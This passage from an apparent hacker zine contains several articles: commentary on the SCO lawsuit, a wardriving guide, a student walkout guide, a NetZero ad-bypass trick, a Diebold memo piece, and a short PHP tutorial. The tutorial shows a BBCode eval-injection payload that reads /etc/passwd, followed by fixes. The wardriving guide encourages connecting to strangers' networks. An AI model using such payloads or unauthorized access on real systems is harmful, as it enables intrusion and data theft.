than the use of functions themselves.

Royalties is where this whole lawsuit lies. An interesting fact

is that Microsoft, one of the world’s leading OS manufacturer

and developer, had arranged to have another corporation

fund SCO in its attacks.

(1) “For months, rumors have swirled around the Web alleging

that Microsoft helped fi nance a small Utah software

company’s suit against IBM and two corporations that use

Linux software. Business Week has learned that Microsoft

did not put up the money, but did play matchmaker for SCO

Group and BayStar Capital, a San Francisco hedge fund

which made a $50 million investment in SCO last October.”

This excerpt is taken from Business Week online. Further

in the article Lawrence Goldfarb is quoted, “neither Chairman

William Gates nor CEO Steve Ballmer were among

the people from Microsoft who approached him.”

(2)On 3 March 2004 Judge Brooke C. Wells ordered IBM

to produce the disputed code, which SCO claim IMB was

using falsely. The Judge also ordered the SCO group to

produce the code they claim IBM had moved from Unix to

Linux. The SCO group was also ordered to identify all code

IBM had allegedly moved. As of today’s date no further

details have come forth. No doubt both parties have been

advised not to comment on the case.

So just where does Microsoft fit into all this you ask?

(3)According to the Open Source community, there was a

memo leak from the SCO offi ce in Utah to SCO executives

referring to money provided them by Microsoft. Below is a

link to the alleged email sent internally by SCO. It appears

that Microsoft is ganging up with SCO in an effort to squash

Linux and further their own dominance in the software industry.

Microsoft has coerced the SCO group into this lawsuit.

Sometime ago Microsoft invested money in SCO by buying

their software licenses for several million dollars. This action

essentially equipped SCO with fundings in court.

Has the giant Microsoft been planning this all along? Is this

their push to force out the underdog? Something similar to

this took place with Apple in 1985. And Microsoft have gotten

the upper hand on that occasion too.

It is sad that major corporations own this planet. They own

everything on it, and they even think they own the people!

To some extent they do. But what could one do about this?

Well, for starters reading this article is the first step toward

awareness.

Knowledge is power! What a person choose to do with this

power defines which side of the fence he or she stand on.

Practice acquired skills and learn all that is possible. Write

solid code, should one choose to start a software company,

write eloquent code that flows through execution. Make it

as secure as possible, keeping in mind it is a labor of love.

Exploring the Wireless World

on your Mac by ikari

A few months ago, I was vacationing in Sun Valley with my family.

After a long day of living the capitalist dream and spending my hardearned

money in the various shops and stores of the Idaho resort

town, I came home to relax and check my email. I took out my iBook,

plugged it in to the phone line, and opened up AOL (yes, it’s AOL, but

damn, they have dial-up numbers everywhere. That’s all I use it for. I

swear.) After connecting at 28800bps, I opened up my AOL mailbox

that hadn’t been used in 3 years and cleared the 1,000+ spam messages

from it. I then proceeded to check my email on my main account,

waiting patiently for each message to trickle down the phone

line. I said to myself, “There’s got to be a faster way to do this.” I remembered

hearing from friends earlier that, when they needed to use

the internet on the run, they just hopped on to a nearby wireless network

and sought out a DHCP lease, hoping they could get on the web

at the expense of a computer-illiterate consumer who just plugged in

a wireless router set to factory defaults to his broadband network. The

legality of such an act is still rather unclear, but I was (and still am)

young, and didn’t really care either way. So, I grabbed my iBook, and

set out into the town to fi nd wireless freedom.

Once I manually found a wireless access point, I used that access

point to download a Mac-based “stumbling” program, called iStumbler.

It’s not the only one out there, but it suits my needs the best. The

main ones for Mac are iStumbler, MacStumbler, and KisMAC, but it’s

really just a matter of personal preference as to which one to use.

Once you’ve got yourself this software, you can drive (or walk, for that

matter) around and attempt to fi nd open wireless networks. You can

use your standard internal antenna, or buy/build an external antenna.

The most common (so it seems) antenna in the wardriving world is a

waveguide, more commonly known as a “cantenna”, because of its

quality and price. I built my cantenna with about $20 in parts and a

$3 can of chili, and it runs circles around my iBook’s built-in antenna.

For example, I mapped out a route around Salt Lake City, and drove it

twice, once with just my iBook, and once with the cantenna attached.

I got 40 APs with my iBook, versus 700 or so with my cantenna.

There’re a number of websites out there devoted to wardriving and

with detailed instructions on building a cantenna, so Google around a

bit so I don’t have to explain it here. All of the Mac, and most of the PC

wardriving programs include some sort of GPS/mapping functionality,

so if you have an NMEA-compatible GPS (most Garmin models) and

a serial cable for the GPS, you can keep track of your wardriving on

a spiffy-looking map.

Once you’ve got yourself a wireless notebook and all the gear you

want/need, set out upon your local neighborhood and see what you

fi nd. You can choose to be active or passive in your wardriving, active

involving connecting to the networks and gaining internet access/

hacking/whatever, and passive involving just looking around, seeing

what’s there. Passive wardriving should have no legal implications,

but the legality of active wardriving, especially depending upon your

defi nition of “active”, is fairly unclear in most states. It’s your responsibility

to know the laws of your area and you are responsible for what

you do while wardriving. With that said, grab your stuff, grab an antenna,

and get out the door! Explore the wireless world!

how to organize a...

STUDENT REVOLUTION!

Students from Lombard, Illinois walk out of school on March 20 to protest the war in Iraq. Later joined

up with Chicago anti-war actions to commit acts of civil disobedience and shut down the city.

Student walkouts are a powerful act of protest. It can be

a way to unite with your peers and build a culture of resistance

at your school. It is a way to temporarily turn your

school upside down and put the students in charge for a

change. It is also valuable organizing training for when

the real revolution comes. And if done right, it can have

a big enough impact that actual change in the system

is made.

Probably the fi rst comment you’ll have is “something like

that will never happen at my school”. At least that’s what

I was saying at the beginning of my senior year of high

school. I never thought we would be able to get away

with half the stuff we pulled off. Our school was so boring,

mundane, uninteresting. By the end of the year, we

had published an underground newspaper distributed in

several local high schools, had formed a network of radical

student activists, and organized a student walkout of

hundreds of kids in protest of the war in Iraq. The entire

culture of the school has changed, and by then I actually

looked forward to going to school because there were so

many interesting things happening every day.

There is absolutely no reason why you cannot accomplish

the same, or better. The ultimate achievement

would be a student strike, sit-in, or walkout. But before

the fun stuff comes a lot of movement building. Set your

sights high, but take practical approaches to your goals.

Before we go any further, your movement must be _

about_ something. If it’s just ‘for the hell of it’, you should

stop reading now because you will fail miserably regardless.

So you need a cause behind your movement? No!

You need a movement behind your cause! If you do not

have a clear message, you will be quickly written off as

mindless teenage rebellion. By having a purpose for the

action, you gain legitimacy among faculty and conservative

students and reduce the risk of discipline from the

authorities. So make this meaningful. Remember: this

is a forum for you to express your dissatisfaction with

the status quo. Believe me, every school has something

unfair about it - dress code, censorship, abusive administrators,

pledge of allegiance, etc. If you play your cards

right, something may even get done about it.

Right. So now that you have selected a few issues to

raise a ruckus about, the fi rst thing you must do before

you develop grandoise plans for student revolution is to

start talking to people. Gather their thoughts about these

issues. Try to get them all riled up and wanting to take

action. While many people have their personal differences,

almost everyone if you talk to them long enough

will agree on some fundamental principles that things are

incredibly unfair and something should be done about it.

You will quickly discover that one of the fi rst things that

you must overcome is any personal inhibitions you might

have towards people. Do NOT be shy or self-restrained.

Don’t be afraid to go up to total strangers in a friendly way

and start sharing all these personal experiences. Reach

out to people of different cultural backgrounds. Don’t let

social cliques and popularity contests keep the student

body divided - believe me, everyone can unite around

the common idea that school is a big waste of time.

Once you get a band of students who want to do something

about it, you should call a general meeting. Make

little fl yers and posters and put them up around school

announcing when, where, and why. Get everyone you

can together in one room to make some decisions about

what can be done about the issue in question. Have everyone

go around the room and introduce themselves.

Make sure no one feels uncomfortable or left out. I also

recommend that you read up about how to organize a

meeting based on the directly democratic concensus

process where everyone is equal to share ideas on an

anti-authoritarian basis.

Whether you want to organize an offi cial student group

or remain unoffi cial is up to you. There are advantages

and disadvantages. While being an offi cial student organization,

the administration will be forced to consider

your actions with more legitimacy, and provide you with

school resources, rooms, announcements on the PA,

putting posters up around school, etc. However, you are

bound by school regulations, which may tie your hands

from any fun or rebellious activities. Of course, that does

not mean that you can work independent of the organizationIt

entirely depends on the context of your school.

Gather as much information about school policies regarding

student organizations and discuss this choice

with the other group members.

Now that you have an activist scene growing at your

school, it’s time to release some publications. Consider

making an underground newsletter to bring your message

to the people. Make the content quick, concise, but

most importantly, INTERESTING! Boredom is counterrevolutionary.

Your movement needs to be fun, enjoyable

and exciting, or no one will want to participate. And when

you distribute it to students, raise a ruckus! Stand near

the doors in the cafeteria handing out your propaganda

while shouting stuff! Make a scene! Blow bubbles and fill

the halls with laughter! Get hundreds of copies to your

friends so that they can distribute them to their friends

and their friends, etc. Make sure every single student has

access to it. And promote discussion - bring up the debate

in your classes, at lunch tables, with strangers in the

lunch line, etc. By now, it has entered mass consciousness,

the seeds have been planted, you have a strong

activist scene, and the time is ripe for an action.

What you should do depends entirely on the context

your movement takes place in. Try to coincide your action

with a particular date of significance(in response to

a controversial policy made by the government or your

school administration, anti-war protest in nearby cities,

etc). If possible, look at your local independent media

center(indymedia.org) to see if there are other student

activist groups planning any actions - and try to coordinate

your actions with theirs. Some things to consider

might be a student walkout, a sit-in in your school, a

march to join up with a larger protest downtown, or in

some situations, a simple teach-in to just discuss the

issues might be appropriate. However, in order to have

any degree of success, you must find a way to bring all

the unfocused meaningless rebellion into organized rebellion

with a purpose.

Weeks before the event, you should prepare some outreach

propaganda. Tape posters up on the walls, in restrooms,

classrooms, bulletin boards. Make quarter page

flyers explaining where, when, and why. Make a website,

advertise it in the official school paper. If you can, try to

get it on the school announcements. Make it exciting -

hype it up! Make it the topic of everyone’s discussion. Tell

everyone you see - even people you don’t know. Do not

be afraid to talk to people you don’t know - get used to

presenting your movement in a quick two minute discussion,

and _don’t be shy_!

Handling the local press is an important factor to consider.

A press release should be drafted explaining what,

who, where, when, and why. It should be short and concise,

yet still keep all the points you want to make intact.

Stick to a few key phrases that are repeated everywhere

- signs, buttons, leaflets, etc. Around a week before the

event, send press releases to all the local newspapers

and television networks. Try to invite reporters to take

pictures and interview people. Bring your own people to

take pictures and document the event. It is easy to get

The protest itself is a blank canvas for you to draw on.

Have ideas for activities ready. Don’t be afraid of creating

a ruckus - but everything you do must have an obvious

purpose. Keep things light-hearted and energetic. Don’t

sit still for a second - dull moments are killer, and people

will lose interest. Bring fun things to the protest itself.

Make drums out of buckets. Make flags and signs. Bring

people to play instruments. Get a dance circle going.

Have lots of random shit to hand out. Consider graffiti

to add some life to your area. Make it lively, entertaining,

and interesting - yet still have a very clear, concise

point which you are able to back up. When people start

leaving, they should be filled with the spirit of activism,

having made contacts with other activists, and looking

forward to or organizing their own future actions. People

should be energized and empowered after the action, not

disenchanted and dulled.

There is a certain high one can get from organizing a

successful action. If done right, the protest can bse a liberating

experience for you and your comrades beyond

the best sex or drugs. If you catch the ecstasy of the moment,

you know you have been doing something right.

After the action, you should prepare a communique

about the events, and call upon other members and their

parents to call the school board to leave their comments.

Depending on the success of your action, they may be

forced to issue a statement or change policies if you have

built a solid movement with a serious argument that pressures

the power that be. And there’s room to grow.

You’re probably wondering why this guide appeared in

this magazine. It’s not about hacking(computers, that is).

However, it is about building movements of people to accomplish

something in real life - a quality that is lacking

in computers and computer users. In this increasingly

oppressive world, people need to work with others and

fight for social justice. All too often hackers consider

themselves elite and above it all in the compute realm,

but when presented with injustice in the realm world,

they simply submit themselves to dominating forces. No

more. Resistance is fertile!

Hacking Regular Expression by ReDucTor

The issue you are about to use, is with in perl compatable regular expression (PCRE), not with in POSIX Regular

Expression. Now, lets start looking at some code:

$body = preg_replace(“/\[b\](.*)\[\/b\]/si”,”\\1”,$body);

$body = preg_replace(“/\[i\](.*)\[\/b\]/si”,”\\1”,$body);

$body = preg_replace(“/\[u\](.*)\[\/u\]/si”,”\\1”,$body);

$body = preg_replace(“/\[img\](.*)\[\/img\]/si”,”’<img src=\”’.str_

replace(‘ ‘,’%20’,’\\1’).’\”>”,$body);

$body = preg_replace(“/\[url\](.*)\[\/url\]/sie”,”’<a href=\”’.str_replace(‘

‘,’%20’,’\\1’).’\”>\\1</a>”,$body);

$body = preg_replace(“/\[url=(.*)\](.*)\[\/url\]/sie”,”’<a href=\”’.str_replace(‘

‘,’%20’,’\\1’).’\”>\\2</a>”,$body);

Nice BB Code uh?

[b]bold[/b] [u]underline[/u] [i]italics[/i] [img]http://somesite.com/img.gif[/img]

[url]http://somesite.com/[/url] [url=http://somesite.com/]Some Site[/url]

Can you spot a way to expoit it? Lets take a look at the url tags and img tag.

[img]http://somtesite.com/img.gif[/img]

Then becomes ‘<img src=”’.str_replace(‘ ‘,’%20’,’http://somesite.com/img.gif’).’”>’

This then gets put through eval:

eval(‘<img src=”’.str_replace(‘ ‘,’%20’,’http://somesite.com/img.gif’).’”>’)

How can we exploit it?, how about leaving the quote marks, then inserting file_get_contents(‘/etc/passwd’)

[img]http://somesite.com/img.gif’.fi le_get_contents(‘/etc/passwd’).’[img]

This then becomes:

eval(‘<img src=”’.str_replace(‘ ‘,’%20’,’http://somesite.com/img.gif’.fi le_get_contents(‘/

etc/passwd’).’’).’”>’)

Woah, look at that, now we have the contents of /etc/passwd. So your a webmaster, and just realised your vulnerable

to this sorta stuff, heres a few tips:

1. Use literal strings

2. Escape The literal char, e.g. turn it into an entitiy

3. Use preg_replace_callback instead

4. Match only what you need not everything

And people with regex test sites, get to work fixing, your going to be big targets now! Have fun!

Bypassing Netzero’s Ad Banner by plastek

Introduction - netzero.com

When using NetZero, the most annoying thing is that

banner at the bottom of the screen. Loading those

ads lags your connection. This really isn’t that bad

especially since the service is free; except for the fact

that you never click on any of those anyway. All the

banner at the bottom of the screen does is slow you

down and take up space. So you ask, how do I kill

the banner? Well of course like anything, there is an

exploit for this. This exploit is manual, which means

you do it yourself. Sooner or later I’ll write a program

to do it.

After getting some background information from a

friend (who prefers to remain anonymous), I discovered

this exploit pretty quickly.

Background

Ever look in a directory on your hard drive and see

all those .dll files? Ever got the impression that they

were just taking up space? Well actually DLL’s are

very important.

First off, DLL stand for Dynamic Link Library. To understand

what a DLL is and how one works, consider

this. You have a computer with Windows 3.1 and

you want to upgrade to Windows 95. So you go out

and buy Windows 95, install it, and it works without

a flaw (keeping in mind this example is hypothetical,

Windows 95 will never run flawlessly). So you take

all software you had on your old computer and start

installing it. Now of course you expect the software

you are installing to look the same in Windows 95 as

they did in 3.1 After all, how could they change? They

were made before Windows 95 was anyway. That’s

where you go wrong, and that’s where DLL’s come

in. As soon as you start up one of the programs, you

notice the title bar is different. It’s a Windows 95 title

bar, with an icon next to the name of the program,

and an “x” button to close the program next to the

traditional maximize and minimize buttons. You wonder

how this is possible. The answer is in the DLL.

There is DLL that all programs in Windows 95 access

to get information. Since the DLL in Windows 95 had

the same name as the one in Windows 3.1, the old

program will access it as well.

DLLs contain information on how to do something.

This something could be connecting to the Internet,

how to access your printer, or in this case, how to go

and build a new window, how to design it etc’. The

good thing about DLLs is that they:

a) Can be loaded and unloaded when the program is

done with the action the DLL was required for, which

saves up some valuable memory.

b) DLLs can be shared between several programs.

For example: if you have two or more programs that

have the option within them to start a PPP session

with your dial-up Internet provider, they can all just

use the same DLL, which means saving up some

disk space (you won’t have to have the same DLL

stored on your hard drive three times). The Unix

equivelants to DLLs are libraries (“libs”).

Preparation

Open up Windows Explorer and get to C:\Program

Files\NetZero\bin. In this directory there is a file called

‘net.dll’. Keep your attention on this file, because in

just a few moments we will move it. Now without

changing the directory, position the left side of the

screen that only shows the directories so that you

can see the directory where you are going to move

‘net.dll’. This is so when you have to move the file,

you won’t have to go looking around for a place to

put it. This is only done to speed up things, because

timing in this exploit is an important factor.

long as it is not in the NetZero directory and that you

remember where you put it.**

Carrying Out The Exploit

Keeping Windows Explorer open, start up NetZero.

Click ‘connect’ and wait for your modem to dial and

connect. As soon as your modem stops screaching

(if you have your modem speaker turned off, turn

it back on using control panel --> modem), quickly

switch back to Windows Explorer and move the ‘net.

dll’ file to another directory. The connection will complete.

At this point you would expect your browser

to open and for the banner to pop up. But nothing

happens. Don’t worry, the connection is fine, and you

won’t get booted off. You have just fooled the banner

program. When you’re done using the Internet,

just close your borwser and a prompt will come up to

close NetZero. Or just double click on the icon in the

toolbar at the bottom of the screen with the two computer

screens. There should be a disconnect button

on that. After you’ve signed off, move ‘net.dll’ back to

C:\Program Files\NetZero\bin

How This Exploit Works

Obviously, the important part of this exploit is the file

‘net.dll’. The NetZero start up program needs to access

this file, that’s why you have to move it back

when you’re done. The banner program needs to

access this file too. If it can’t find the file, the program

just doesn’t start. Strangley enough, it doesn’t

boot you off or anything. Lately when using this exploit

I have noticed something though. The inactivity

timeout rate is extremely low, like 5 minutes or

something.

Enjoy it.

Elections Undermine Democracy by DragonMaw

Internal development memos

Diebold provides electronic voting systems for 37

different states. These systems have come under

extreme controversy due to serious security

issues which have come to light through internal

development memos that hackers have leaked

to the public. This raises the question of how

corporations using privatized coding systems

threaten the democratic electoral process.

Diebold Electronic Voting Systems sued several

distributers of the leaked memos, claiming that

“they violated copyright law”. This was shown to

be false by several students at major universities,

as the memos did not meet the DMCA requirement

for copyrighted material. Excerpt:

“Diebold’s blanket cease-and-desist notices are a

blatant abuse of copyright law,” said [Electronic

Frontier Foundation] Staff Attorney Wendy

Seltzer. “Publication of the Diebold documents

is clear fair use because of their importance to

the public debate over the accuracy of electronic

voting machines.”

The staff at Why-War.com launched an electronic

civil disobedience campaign against Diebold,

mirroring copies of the memos to hundreds of

places on the internet, including file sharing

services, usenet, and www mirrors. In response,

Diebold launches more lawsuits for the leaking

of internal memos to the general public. This is

proved in court to be a violation of the freedom of

information act as well as the bill of rights(freedom

of speech).

Finally, due to the success of the electronic civil

disobedience campaign, press coverage of the

memos, the denouncement of their legal tactics,

and a federal order, Diebold retracted all ceaseand-

desist letters and suits, and offered a public

apology.

Freedom of Information

The Diebold scandal raises all sorts of

controversial legal and ethical dilemmas. The

accountability of private corporations who abuse

copyright and freedom of information law, the

threat to the democratic process that proprietory

coding poses, and etc.

Corporations, in the defense of their relentless

quest of the almighty dollar, have violently

disregarded the constitution. If the democratic

process can be sold to the highest bidder, then

the public will forever be under the greedy wrath

of profiteering corporations who have no concern

of the fundamental rights to freedom of the press

and democratic elections.

Activists are angry, demanding that all information

must be released to public scrutiny; instead of

being locked away, hiding important and damning

secrets which would hurt “profit”. A closed

privatized voting system undermines the very

concept of open, public, and democratic elections.

Public systems should be based on an opensource

model, which historically have yielded the

most secure, stable, and democratic systems.

Political Ties

It is of little surprise that Diebold has made large

financial contributions to the Bush administration.

Would you want a president who received

dirty money from breaking copyright law and

undermining the democratic process?

A Dose of Optimism

Diebold has been proven wrong, criminally

negligant, and threatens to undermine the

democratic process of our country. The Diebold

scandal has opened many people’s eyes to the

disregard corporations have for public interest.

This campaign would not have been successful

without the diligent effort of hackers and political

activists working together. Time and time again,

history proves that people have the ability to

organize cooperatively to put direct pressure on

politicians and institutions to make progressive

changes. Hopefully this will set a precedent for

future successful electronic civil disobedience

campaigns in the years to come.

</example>

Home